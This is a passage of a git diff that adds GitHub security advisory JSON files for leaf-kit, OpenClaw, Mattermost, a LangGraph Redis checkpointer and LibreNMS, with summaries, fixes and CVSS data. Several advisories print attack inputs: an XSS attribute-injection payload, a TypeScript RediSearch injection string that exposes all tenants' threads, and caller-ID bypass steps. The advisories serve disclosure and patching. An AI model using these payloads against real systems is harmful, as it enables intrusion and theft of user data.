[\n \"msg\": Hello.msg ?? \"Hello World!\"\n ])\n }\n}\n```\n\nWith a hello.leaf that looks like\n```\n
Hover to see message
\n```\n\nAnd then you POST something like `msg=%22%cc%81=1%20autofocus%20tabindex=0%20onfocus=alert(1)%20`\n\n### Impact\nIf a website uses leaf to escape an attribute value based on user input, the attacker may be able to insert a malicious attribute. If a site is not using a secure CSP policy, then this can be used to execute malicious javascript (XSS). Impact is context dependent if a site is using a secure CSP policy.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "SwiftURL", + "name": "leaf-kit" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.4.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/vapor/leaf-kit/security/advisories/GHSA-4hfh-fch3-5q7p" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27120" + }, + { + "type": "WEB", + "url": "https://github.com/vapor/leaf-kit/commit/8919e39476c3a4ba05c28b71546bb9195f87ef34" + }, + { + "type": "PACKAGE", + "url": "https://github.com/vapor/leaf-kit" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-75", + "CWE-79", + "CWE-87" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-19T19:40:08Z", + "nvd_published_at": "2026-02-20T22:16:29Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-4hg8-92x6-h2f3/GHSA-4hg8-92x6-h2f3.json b/advisories/github-reviewed/2026/02/GHSA-4hg8-92x6-h2f3/GHSA-4hg8-92x6-h2f3.json new file mode 100644 index 0000000000000..0b9184be45e10 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-4hg8-92x6-h2f3/GHSA-4hg8-92x6-h2f3.json @@ -0,0 +1,73 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4hg8-92x6-h2f3", + "modified": "2026-02-20T16:44:19Z", + "published": "2026-02-17T21:40:46Z", + "aliases": [ + "CVE-2026-26319" + ], + "summary": "OpenClaw is Missing Webhook Authentication in Telnyx Provider Allows Unauthenticated Requests", + "details": "## Summary\n\nIn affected versions, OpenClaw's optional `@openclaw/voice-call` plugin Telnyx webhook handler could accept unsigned inbound webhook requests when `telnyx.publicKey` was not configured, allowing unauthenticated callers to forge Telnyx events.\n\nThis only impacts deployments where the Voice Call plugin is installed, enabled, and the webhook endpoint is reachable from the attacker (for example, publicly exposed via a tunnel/proxy).\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected: `<= 2026.2.13`\n- Fixed: `>= 2026.2.14` (planned)\n\n## Details\n\nTelnyx webhooks are expected to be authenticated via Ed25519 signature verification.\n\nIn affected versions, `TelnyxProvider.verifyWebhook()` could effectively fail open when no Telnyx public key was configured, allowing arbitrary HTTP POST requests to the voice-call webhook endpoint to be treated as legitimate Telnyx events.\n\n## Fix\n\nThe fix makes Telnyx webhook verification fail closed by default and requires `telnyx.publicKey` (or `TELNYX_PUBLIC_KEY`) to be configured.\n\nA signature verification bypass exists only for local development via `skipSignatureVerification: true`, which is off by default, emits a loud startup warning, and should not be used in production.\n\nThis requirement is documented in the Voice Call plugin docs.\n\n## Fix Commit(s)\n\n- `29b587e73cbdc941caec573facd16e87d52f007b`\n- `f47584fec` (centralized verification helper + stronger tests)\n\n## Workarounds\n\n- Configure `plugins.entries.voice-call.config.telnyx.publicKey` (or `TELNYX_PUBLIC_KEY`) to enable signature verification.\n- Only for local development: set `skipSignatureVerification: true`.\n\nThanks @p80n-sec for reporting.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.14" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-4hg8-92x6-h2f3" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26319" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/29b587e73cbdc941caec573facd16e87d52f007b" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/f47584fec86d6d73f2d483043a2ad0e7e3c50411" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.14" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-306" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-17T21:40:46Z", + "nvd_published_at": "2026-02-19T23:16:24Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-4rj2-gpmh-qq5x/GHSA-4rj2-gpmh-qq5x.json b/advisories/github-reviewed/2026/02/GHSA-4rj2-gpmh-qq5x/GHSA-4rj2-gpmh-qq5x.json new file mode 100644 index 0000000000000..4d6bd69616268 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-4rj2-gpmh-qq5x/GHSA-4rj2-gpmh-qq5x.json @@ -0,0 +1,63 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4rj2-gpmh-qq5x", + "modified": "2026-02-17T21:36:34Z", + "published": "2026-02-17T21:36:34Z", + "aliases": [], + "summary": "OpenClaw has an inbound allowlist policy bypass in voice-call extension (empty caller ID + suffix matching)", + "details": "### Summary\n\nAn authentication bypass in the optional `voice-call` extension/plugin allowed unapproved or anonymous callers to reach the voice-call agent when inbound policy was set to `allowlist` or `pairing`.\n\nDeployments that do not install/enable the `voice-call` extension are not affected.\n\n### Affected Packages / Versions\n\n- `openclaw` (npm): `<= 2026.2.1`\n- Fixed in: `>= 2026.2.2`\n\n### Details\n\nIn affected versions (for example `2026.2.1`), the inbound allowlist check in `extensions/voice-call/src/manager.ts` used suffix-based matching and accepted empty caller IDs after normalization.\n\nThis allowed two bypasses:\n\n1. Missing/empty `from` values normalized to an empty string, which caused the allowlist predicate to evaluate as allowed.\n2. Suffix-based matching meant any caller number whose digits ended with an allowlisted number would be accepted.\n\n### Proof Of Concept\n\n1. Configure the voice-call extension with `inboundPolicy: allowlist` and `allowFrom: [\"+15550001234\"]`.\n2. Place/trigger an inbound call with missing/empty caller ID (provider-dependent; for example anonymous/restricted caller). The call is accepted.\n3. Place a call from a number whose E.164 digits end with `15550001234` (for example `+99915550001234`). The call is accepted.\n\n### Impact\n\nOnly operators who install/enable the optional `voice-call` extension and use `inboundPolicy=allowlist` or `pairing` could have inbound access controls bypassed, potentially allowing unauthorized callers to reach auto-response and tool execution.\n\n### Fix\n\nThe fix hardens inbound policy handling:\n\n- Reject inbound calls when caller ID is missing.\n- Require strict equality when comparing normalized caller IDs against the allowlist (no suffix/prefix matching).\n- Add regression tests for missing caller ID, anonymous caller ID, and suffix-collision cases.\n\nFix commit(s):\n\n- `f8dfd034f5d9235c5485f492a9e4ccc114e97fdb`\n\nThanks @simecek for reporting.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-4rj2-gpmh-qq5x" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/f8dfd034f5d9235c5485f492a9e4ccc114e97fdb" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.2" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-287" + ], + "severity": "CRITICAL", + "github_reviewed": true, + "github_reviewed_at": "2026-02-17T21:36:34Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-56f2-hvwg-5743/GHSA-56f2-hvwg-5743.json b/advisories/github-reviewed/2026/02/GHSA-56f2-hvwg-5743/GHSA-56f2-hvwg-5743.json new file mode 100644 index 0000000000000..80645760a9ffb --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-56f2-hvwg-5743/GHSA-56f2-hvwg-5743.json @@ -0,0 +1,67 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-56f2-hvwg-5743", + "modified": "2026-02-17T17:13:35Z", + "published": "2026-02-17T17:13:35Z", + "aliases": [], + "summary": "OpenClaw affected by SSRF in Image Tool Remote Fetch", + "details": "## Summary\n\nA server-side request forgery (SSRF) vulnerability in the Image tool allowed attackers to force OpenClaw to make HTTP requests to arbitrary internal or restricted network targets.\n\n## Affected Versions\n\n- npm: openclaw <= 2026.2.1\n\n## Patched Versions\n\n- npm: openclaw 2026.2.2 and later\n\n## Fix Commits\n\n- 81c68f582d4a9a20d9cca9f367d2da9edc5a65ae (guard remote media fetches with SSRF checks)\n- 9bd64c8a1f91dda602afc1d5246a2ff2be164647 (expand SSRF guard coverage)\n\n## Details\n\nThe Image tool accepts file paths, file:// URLs, data: URLs, and http(s) URLs. In vulnerable versions, http(s) URLs were fetched without SSRF protections, enabling requests to localhost, RFC1918, link-local, and cloud metadata targets.\n\nThis was fixed by routing remote media fetching through the SSRF guard (private/internal IP + hostname blocking, redirect hardening, DNS pinning).\n\n## Exploitability Notes\n\n- Requires attacker-controlled invocation of the Image tool (direct tool access, or a gateway/channel surface that forwards untrusted `image` arguments into tool calls).\n- The image tool expects the fetched content to be an image. Many high-value SSRF targets return text/JSON (for example cloud metadata endpoints), which will typically fail media-type validation. In practice, the most direct confidentiality impact comes from internal endpoints that actually return images (screenshots/renderers, camera snapshots, chart exports, etc.).\n- Remote fetches are GET-only with no custom headers. Some metadata services require special headers or session tokens (for example GCP `Metadata-Flavor`, AWS IMDSv2 token), which can further reduce the likelihood of direct credential theft in some environments.\n- Despite the above constraints, SSRF remains a powerful primitive: it can enable internal network probing and access to unauthenticated/internal HTTP endpoints, and can chain with other weaknesses if present.\n\nThanks @p80n-sec for reporting.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-56f2-hvwg-5743" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/81c68f582d4a9a20d9cca9f367d2da9edc5a65ae" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/9bd64c8a1f91dda602afc1d5246a2ff2be164647" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.2" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-17T17:13:35Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-57cc-2pf4-mhmx/GHSA-57cc-2pf4-mhmx.json b/advisories/github-reviewed/2026/02/GHSA-57cc-2pf4-mhmx/GHSA-57cc-2pf4-mhmx.json new file mode 100644 index 0000000000000..c28727a9374af --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-57cc-2pf4-mhmx/GHSA-57cc-2pf4-mhmx.json @@ -0,0 +1,141 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-57cc-2pf4-mhmx", + "modified": "2026-02-19T19:35:24Z", + "published": "2026-02-16T15:32:47Z", + "aliases": [ + "CVE-2025-14350" + ], + "summary": "Mattermost fails to properly validate team membership when processing channel mentions", + "details": "Mattermost versions 11.1.x <= 11.1.2, 10.11.x <= 10.11.9, 11.2.x <= 11.2.1 fail to properly validate team membership when processing channel mentions which allows authenticated users to determine the existence of teams and their URL names via posting channel shortlinks and observing the channel_mentions property in the API response. Mattermost Advisory ID: MMSA-2025-00563", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/mattermost/mattermost/server/v8" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "8.0.0-20251209134645-761e56bb11cc" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/mattermost/mattermost-server" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "11.1.0" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "< 11.1.3" + } + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/mattermost/mattermost-server" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "10.11.0" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "< 10.11.10" + } + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/mattermost/mattermost-server" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "11.2.0" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "< 11.2.2" + } + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/mattermost/mattermost-server" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "5.3.2-0.20251209134645-761e56bb11cc" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14350" + }, + { + "type": "WEB", + "url": "https://github.com/mattermost/mattermost/commit/761e56bb11ccb751ddbe4bab5898ccc2b384fd82" + }, + { + "type": "PACKAGE", + "url": "https://github.com/mattermost/mattermost" + }, + { + "type": "WEB", + "url": "https://mattermost.com/security-updates" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-19T19:35:24Z", + "nvd_published_at": "2026-02-16T13:15:59Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-5g94-c2wx-8pxw/GHSA-5g94-c2wx-8pxw.json b/advisories/github-reviewed/2026/02/GHSA-5g94-c2wx-8pxw/GHSA-5g94-c2wx-8pxw.json index 40168473dad55..78729e2a9fa3c 100644 --- a/advisories/github-reviewed/2026/02/GHSA-5g94-c2wx-8pxw/GHSA-5g94-c2wx-8pxw.json +++ b/advisories/github-reviewed/2026/02/GHSA-5g94-c2wx-8pxw/GHSA-5g94-c2wx-8pxw.json @@ -55,6 +55,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-22", "CWE-23" ], "severity": "HIGH", diff --git a/advisories/github-reviewed/2026/02/GHSA-5mx2-w598-339m/GHSA-5mx2-w598-339m.json b/advisories/github-reviewed/2026/02/GHSA-5mx2-w598-339m/GHSA-5mx2-w598-339m.json new file mode 100644 index 0000000000000..fc0753303755a --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-5mx2-w598-339m/GHSA-5mx2-w598-339m.json @@ -0,0 +1,73 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5mx2-w598-339m", + "modified": "2026-02-23T22:20:29Z", + "published": "2026-02-18T22:40:09Z", + "aliases": [ + "CVE-2026-27022" + ], + "summary": "RediSearch Query Injection in @langchain/langgraph-checkpoint-redis", + "details": "## Summary\n\nA query injection vulnerability exists in the `@langchain/langgraph-checkpoint-redis` package's filter handling. The `RedisSaver` and `ShallowRedisSaver` classes construct RediSearch queries by directly interpolating user-provided filter keys and values without proper escaping. RediSearch has special syntax characters that can modify query behavior, and when user-controlled data contains these characters, the query logic can be manipulated to bypass intended access controls.\n\n## Attack surface\n\nThe core vulnerability was in the `list()` methods of both `RedisSaver` and `ShallowRedisSaver`: these methods failed to escape RediSearch special characters in filter keys and values when constructing queries. When unescaped data containing RediSearch syntax was used, the injected operators were interpreted by RediSearch rather than treated as literal search values.\n\nThis escaping bug enabled the following attack vector:\n\n- **Thread boundary escape via OR operator**: RediSearch uses `|` as an OR operator with specific precedence rules. A query like `A B | C` is interpreted as `(A AND B) OR C`. By injecting `}) | (@thread_id:{*` into a filter value, an attacker can append an OR clause that matches all threads, effectively bypassing the thread isolation constraint.\n\nThe injected query `(@thread_id:{legitimate-thread}) (@source:{x}) | (@thread_id:{*})` matches:\n\n- Documents with `thread_id:legitimate-thread AND source:x`, OR\n- Documents with ANY `thread_id`\n\nThe second clause matches all threads, bypassing thread isolation entirely.\n\n## Who is affected?\n\nApplications are vulnerable if they:\n\n- **Pass user-controlled input to filter parameters** — When using `getStateHistory()` or `checkpointer.list()` with filter values derived from user input, HTTP parameters, or other untrusted sources.\n- **Use Redis checkpointing in multi-tenant applications** — Applications that rely on thread isolation to separate data between users or tenants are at risk of cross-tenant data access.\n\nThe most common attack vector is through API endpoints that expose filtering capabilities to end users, allowing them to search or filter their conversation history.\n\n## Impact\n\nAttackers who control filter input can bypass thread isolation by injecting RediSearch OR operators to construct queries that match all threads regardless of the intended thread constraint. This enables access to checkpoint data from threads the attacker is not authorized to view.\n\nKey severity factors:\n\n- Enables complete bypass of thread-based access controls\n- Sensitive conversation data from other users may be exposed\n- Affects multi-tenant applications relying on thread isolation for data separation\n- Requires only control over filter input values (common in user-facing APIs)\n\n## Exploit example\n\n```typescript\nimport { RedisSaver } from \"@langchain/langgraph-checkpoint-redis\";\n\nconst saver = new RedisSaver({ /* redis config */ });\n\n// Normal usage - should only see thread \"user-123-thread\"\nconst legitHistory = saver.list({\n configurable: { thread_id: \"user-123-thread\" }\n}, {\n filter: { source: \"loop\" }\n});\n\n// Attacker crafts malicious filter value\nconst attackerFilter = {\n source: \"x}) | (@thread_id:{*\" // Injects OR clause matching ALL threads\n};\n\n// This produces a query like:\n// (@thread_id:{user-123-thread}) (@source:{x}) | (@thread_id:{*})\n// Due to precedence, this matches ALL threads!\n\nconst stolenHistory = saver.list({\n configurable: { thread_id: \"user-123-thread\" }\n}, {\n filter: attackerFilter\n});\n\n// stolenHistory now contains checkpoints from ALL threads - DATA LEAKED!\n```\n\n## Security hardening changes\n\nThe 1.0.2 patch introduces the following changes:\n\n- **Escape utility function**: A new `escapeRediSearchTagValue()` function properly escapes all RediSearch special characters (`- . < > { } [ ] \" ' : ; ! @ # $ % ^ & * ( ) + = ~ | \\ ? /`) by prefixing them with backslashes.\n- **Filter key escaping**: All filter keys are escaped before being used in query construction.\n- **Filter value escaping**: All filter values are escaped before being interpolated into RediSearch tag queries.\n\n## Migration guide\n\n### No changes needed for most users\n\nThe fix is backward compatible. Existing code will work without modifications—filter values that previously worked will continue to work, with the added protection against injection:\n\n```typescript\nimport { RedisSaver } from \"@langchain/langgraph-checkpoint-redis\";\n\n// Works exactly as before, now with injection protection\nconst history = saver.list(config, {\n filter: { source: \"loop\" }\n});\n```\n\n### If you were relying on special characters\n\nIf your application intentionally used RediSearch syntax in filter values (unlikely but possible), be aware that these characters will now be escaped and treated as literals.\n\n### For applications with user-facing filters\n\nNo code changes required, but this is a good time to review your API design:\n\n```typescript\n// Before: Vulnerable to injection\napp.get(\"/history\", async (req, res) => {\n const history = await saver.list(config, {\n filter: req.query.filter // User-controlled - was vulnerable\n });\n});\n\n// After: Now safe, but consider validating allowed filter keys\napp.get(\"/history\", async (req, res) => {\n const allowedKeys = [\"source\", \"step\"];\n const sanitizedFilter = Object.fromEntries(\n Object.entries(req.query.filter || {})\n .filter(([key]) => allowedKeys.includes(key))\n );\n const history = await saver.list(config, {\n filter: sanitizedFilter\n });\n});\n```\n\n> **Recommendation**: Even with the fix in place, consider validating that filter keys are from an allowed list as a defense-in-depth measure.\n\n## References\n\n- [RediSearch Query Syntax](https://redis.io/docs/interact/search-and-query/query/)\n- [LangGraph Checkpoint Documentation](https://langchain-ai.github.io/langgraphjs/)", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "@langchain/langgraph-checkpoint-redis" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.0.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/langchain-ai/langgraphjs/security/advisories/GHSA-5mx2-w598-339m" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27022" + }, + { + "type": "WEB", + "url": "https://github.com/langchain-ai/langgraphjs/pull/1943" + }, + { + "type": "WEB", + "url": "https://github.com/langchain-ai/langgraphjs/commit/814c76dc3938d0f6f7e17ca3bc11d6a12270b2a1" + }, + { + "type": "PACKAGE", + "url": "https://github.com/langchain-ai/langgraphjs" + }, + { + "type": "WEB", + "url": "https://github.com/langchain-ai/langgraphjs/releases/tag/@langchain/langgraph-checkpoint-redis@1.0.2" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T22:40:09Z", + "nvd_published_at": "2026-02-20T22:16:28Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-5pqf-54qp-32wx/GHSA-5pqf-54qp-32wx.json b/advisories/github-reviewed/2026/02/GHSA-5pqf-54qp-32wx/GHSA-5pqf-54qp-32wx.json new file mode 100644 index 0000000000000..73c3c3c48bb22 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-5pqf-54qp-32wx/GHSA-5pqf-54qp-32wx.json @@ -0,0 +1,73 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5pqf-54qp-32wx", + "modified": "2026-02-20T16:51:51Z", + "published": "2026-02-18T22:07:19Z", + "aliases": [ + "CVE-2026-26991" + ], + "summary": "LibreNMS /device-groups name Stored Cross-Site Scripting", + "details": "### Summary\n**/device-groups name Stored Cross-Site Scripting**\n- HTTP POST\n- Request-URI(s): \"/device-groups\"\n- Vulnerable parameter(s): \"name\"\n- Attacker must be authenticated with \"admin\" privileges.\n- When a user adds a device group, an HTTP POST request is sent to the Request-URI \"/device-groups\". The name of the newly created device group is stored in the value of the name parameter.\n- After the device group is created, the entry is displayed along with some relevant buttons like Rediscover Devices, Edit, and Delete.\n\n### Details\nThe vulnerability exists as the name of the device group is not sanitized of HTML/JavaScript-related characters\nor strings. When the delete button is rendered, the following template is used to render the page:\n\n_resources/views/device-group/index.blade.php:_\n```\n@section('title', __('Device Groups'))\n@section('content')\n
\n\n// [...Truncated...]\n@foreach($device_groups as $device_group)\n// [...Truncated...]\n\n